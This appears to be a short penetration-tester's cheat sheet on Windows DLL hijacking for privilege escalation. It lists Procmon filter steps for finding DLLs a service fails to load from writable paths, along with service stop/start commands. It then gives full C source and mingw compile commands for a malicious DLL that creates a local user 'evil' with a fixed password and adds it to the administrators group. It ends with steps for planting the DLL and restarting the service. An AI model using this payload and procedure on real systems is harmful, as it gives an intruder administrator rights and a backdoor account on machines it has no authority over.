DLL/EXE Hijacking
- Run Procmon as administrator in rdp session
- Add filters
- Result - is - NAME NOT FOUND - Include - click add
- Path - ends with - .dll - include - click add
- .apply and okay
- cmd.exe
- sc stop dllsvc or servicename
- or sc.exe stop dllsvc
- sc start dllsvc
- OR net stop <servicename>
- net start <servicename>
- sc stop dllsvc or servicename
- Now procmon will show more output
- Check for any .dll file path which is writable
- Now create same .dll file using windows_dll.c script in kali👨💻// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
//or we can add a new user to administrator group
system("cmd.exe /k net user evil pass1234 /add");
system("cmd.exe /k net localgroup administrators evil /add");
ExitProcess(0);
}
return TRUE;
}- x86_64-w64-mingw32-gcc windows_dll.c -shared -o <vuln-dll>.dll
- transfer .dll to wrtable location found on Procmon
- sc stop dllsvc & sc start dllsvc
- now evil user has been added in administrator group